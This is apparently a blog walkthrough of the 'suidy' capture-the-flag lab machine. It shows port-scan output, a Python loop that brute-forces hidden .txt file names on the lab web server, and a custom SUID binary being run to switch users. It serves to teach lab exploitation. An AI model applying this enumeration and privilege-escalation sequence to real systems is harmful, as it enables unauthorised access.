Posted onEdited onInctfViews: Disqus: Word count in article: 852Reading time ≈3 mins.
Hidden directory discovery, SSH brute-force, and custom SUID binary exploitation.
suidy
scan
1 2 3 4 5 6 7 8 9 10
❯ rustscan -a 192.168.0.109 -- -A -sV PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 53/tcp open domain syn-ack (generic dns response: SERVFAIL) 80/tcp open http syn-ack nginx 1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-title: Site doesn't have a title (text/html). |_http-server-header: nginx/1.14.2 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!
for j in sys.stdin: j=j.strip() response=requests.get(f"http://192.168.0.109/shehatesme{j}") # print(f"http://192.168.0.109/shehatesme{j}") print(response.text)
theuser@suidy:/home/suidy$ ./suidyyyyy suidy@suidy:/home/suidy$ id uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) suidy@suidy:/home/suidy$ cat note.txt I love SUID files! The best file is suidyyyyy because users can use it to feel as I feel. root know it and run an script to be sure that my file has SUID. If you are "theuser" I hate you!